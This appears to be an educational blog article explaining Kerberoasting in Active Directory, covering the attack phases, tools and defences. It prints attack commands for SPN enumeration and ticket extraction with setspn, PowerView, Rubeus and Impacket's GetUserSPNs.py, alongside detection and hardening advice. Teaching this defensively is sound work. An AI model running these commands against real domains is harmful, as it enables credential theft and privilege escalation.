To fully grasp Kerberoasting, it is essential to understand how Kerberos authentication operates within enterprise networks, particularly in Microsoft Active Directory environments.

Kerberos is a network authentication protocol designed to provide secure authentication for client-server applications. Developed at MIT in the 1980s, Kerberos is widely used in modern enterprise networks, especially those leveraging Active Directory. Its core objective is to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner, using secret-key cryptography.

Kerberos is recognized for its efficiency and security, but as with any protocol, it is not immune to exploitation. For a technical overview, see the MIT Kerberos Project.

The Kerberos protocol relies on several key components:

• Key Distribution Center (KDC): The trusted authority that issues tickets and authenticates users. It comprises two main services:
  • Authentication Service (AS): Verifies user identity and issues Ticket Granting Tickets (TGTs).
  • Ticket Granting Service (TGS): Issues service tickets for access to specific network resources.
• Client: The user or system requesting access to a service.
• Service: The application or resource the client wants to access (e.g., file server, database).
• Service Principal Name (SPN): A unique identifier for each service instance in the network.

When a user wants to access a network service, Kerberos issues a service ticket (TGS ticket). This ticket is encrypted using the target service account’s password hash. Only the service with the correct key can decrypt and validate the ticket. This mechanism is central to Kerberos’ security, but it is also the very feature that enables Kerberoasting attacks.

For a detailed explanation of Kerberos tickets, refer to Microsoft's Kerberos Authentication Overview.

Kerberoasting is a post-exploitation attack technique that targets service accounts in Active Directory environments. By requesting service tickets for accounts with Service Principal Names (SPNs), attackers can extract these tickets and attempt to crack their encrypted content offline. If successful, the attacker gains access to the plaintext credentials of privileged service accounts, potentially enabling lateral movement or privilege escalation.

This technique was first publicized by Tim Medin at the SANS Institute and has since become a staple in both penetration testing and real-world attacks.

Kerberoasting exploits the way Kerberos issues service tickets. When a user requests access to a service, the KDC encrypts the ticket using the service account’s password hash. Attackers with valid domain credentials can request these tickets for any service account, extract them from memory, and attempt to crack the hash offline using brute-force or dictionary attacks.

Because the cracking process occurs offline, it is not limited by account lockout policies or detection mechanisms that monitor failed logins.

Service accounts often have elevated privileges and, in many organizations, use weak or infrequently changed passwords. By targeting these accounts, attackers can:

• Obtain credentials for high-privilege accounts.
• Move laterally within the network.
• Escalate privileges to domain administrator.

The combination of high value and often weak protection makes service tickets a prime target for Kerberoasting attacks.

Understanding the Kerberoasting process step-by-step is crucial for both defenders and penetration testers. Below, we break down each phase of the attack.

The first step in a Kerberoasting attack is to identify accounts with registered Service Principal Names (SPNs). These accounts are typically associated with services like SQL Server, IIS, or custom applications.

Attackers use tools or native commands to enumerate SPNs in the domain. For example:

setspn -T DOMAIN -Q */*

This command lists all accounts with SPNs, revealing potential targets for Kerberoasting.

Once SPNs are identified, the attacker uses their valid domain credentials to request service tickets for these accounts. This is a legitimate operation and does not raise immediate suspicion, as any authenticated user can request service tickets for any SPN in the domain.

The KDC responds by issuing a service ticket encrypted with the service account’s password hash.

After receiving the service tickets, the attacker extracts them from memory or network traffic. Tools like Rubeus or Impacket can automate this process, saving the tickets in a format suitable for offline cracking.

The extracted tickets contain the encrypted portion that, if cracked, reveals the service account’s password.

The attacker then uses password-cracking tools (e.g., Hashcat, John the Ripper) to perform offline brute-force or dictionary attacks against the extracted ticket hashes. If the service account uses a weak password, it can often be cracked in minutes or hours.

With the plaintext password, the attacker can authenticate as the service account, potentially gaining elevated access within the network. For a deeper dive into these techniques and the latest advancements, check out the Password Cracking Guide 2025: 5 Latest Techniques.

Several open-source tools have been developed to automate the Kerberoasting attack process. Understanding these tools is essential for both red and blue teams.

PowerView is a PowerShell toolset for network situational awareness in Windows domains. It allows attackers and penetration testers to enumerate SPNs, identify service accounts, and gather domain information.

Example command to find Kerberoastable accounts:

Get-NetUser -SPN

For more information, see the PowerSploit GitHub repository.

Rubeus is a powerful C# tool for Kerberos abuse, including ticket extraction and Kerberoasting. It can request service tickets, extract them, and format them for cracking.

Sample usage:

Rubeus kerberoast

See the Rubeus GitHub repository for documentation and usage examples.

Impacket is a Python library for working with network protocols, including Kerberos. Its GetUserSPNs.py script automates SPN enumeration and ticket extraction.

Example command:

python GetUserSPNs.py domain/user:password

For more details, visit the Impacket GitHub repository.

Defending against Kerberoasting requires a combination of monitoring, hardening, and proactive security policies. Below are key strategies to detect and mitigate these attacks.

Monitor domain controllers for unusual volumes of service ticket requests, especially from non-administrative accounts. Key indicators include:

• Multiple requests for different SPNs from the same user.
• Requests for tickets associated with high-privilege accounts.

Enable and analyze Windows event logs, particularly Event ID 4769 (A Kerberos service ticket was requested). SIEM solutions can help correlate and alert on suspicious activity. For guidance, see CISA's Kerberoasting Detection and Mitigation.

Reduce the attack surface by minimizing the number of service accounts and ensuring they have only the necessary privileges. Where possible:

• Use Group Managed Service Accounts (gMSA) for automatic password management.
• Restrict service accounts from interactive logon.
• Regularly review and remove unnecessary SPNs.

For best practices, refer to CIS Controls v8.

Since Kerberoasting relies on cracking weak passwords, enforcing strong password policies is critical. Recommendations include:

• Require complex, lengthy passwords for all service accounts.
• Change service account passwords regularly.
• Monitor for password reuse across accounts.

See NIST SP 800-63B for password policy standards. For additional guidance on establishing robust password requirements and policy management, review the resource on Password Policy Best Practices 2025.

Regularly audit service accounts, SPNs, and ticket requests. Implement network segmentation to limit lateral movement if a service account is compromised. Additional measures include:

• Restricting administrative access to sensitive systems.
• Isolating high-value assets in separate network segments.
• Implementing Just-In-Time (JIT) and Just-Enough-Administration (JEA) principles.

For more on segmentation, see CrowdStrike's Network Segmentation Guide.

Kerberoasting has been observed in numerous real-world attacks, often as part of a broader campaign targeting enterprise networks.

• APT Attacks: Advanced Persistent Threat (APT) groups have leveraged Kerberoasting to escalate privileges after initial compromise. For example, Unit 42 documented Kerberoasting in targeted attacks against financial institutions.
• Ransomware Campaigns: Ransomware operators have used Kerberoasting to gain domain admin access, enabling widespread deployment of ransomware payloads. See BleepingComputer for recent trends.
• Penetration Testing: Kerberoasting is a standard technique in red team engagements. Reports from Rapid7 highlight how quickly weak service account passwords can be cracked in real-world environments.

These examples underscore the importance of proactive defense against Kerberoasting. For further insight into how password recovery and cracking works in practice, explore How password recovering works at Online Hash Crack.

While understanding Kerberoasting is vital for defense, it is important to recognize the ethical and legal boundaries surrounding its use.

• Penetration Testing: Only perform Kerberoasting in environments where you have explicit authorization. Unauthorized use is illegal and can result in criminal charges.
• Responsible Disclosure: If you discover vulnerable service accounts, report them through proper channels.
• Compliance: Ensure all security testing aligns with organizational policies and relevant regulations (e.g., GDPR, HIPAA).

For more on ethical hacking, see ISACA's Ethical Hacking Guidance. For structured guidance on legal password testing, see Legal Password Testing: Stay Compliant in 2025.

Kerberoasting represents a significant threat to organizations relying on Kerberos authentication. By understanding how attackers exploit service tickets and implementing robust detection and prevention strategies, defenders can greatly reduce the risk of credential compromise. Regular auditing, strong password policies, and vigilant monitoring are essential components of a comprehensive defense against password-recovery attacks like Kerberoasting.

Stay informed, stay vigilant, and prioritize the security of your service accounts to protect your enterprise from evolving threats.

• MITRE ATT&CK: Kerberoasting
• SANS: Kerberoasting Explained
• CISA: Kerberoasting Detection and Mitigation
• Microsoft: Kerberos Authentication Overview
• CIS Controls v8
• BleepingComputer: Kerberoasting in Ransomware Campaigns
• Rubeus GitHub Repository
• Impacket GitHub Repository
• PowerView GitHub Repository
• CrowdStrike: Network Segmentation
• NIST SP 800-63B: Digital Identity Guidelines
• ISACA: Ethical Hacking Legal and Ethical Considerations
• Password Cracking Guide 2025: 5 Latest Techniques
• Password Policy Best Practices 2025
• How password recovering works at Online Hash Crack
• Legal Password Testing: Stay Compliant in 2025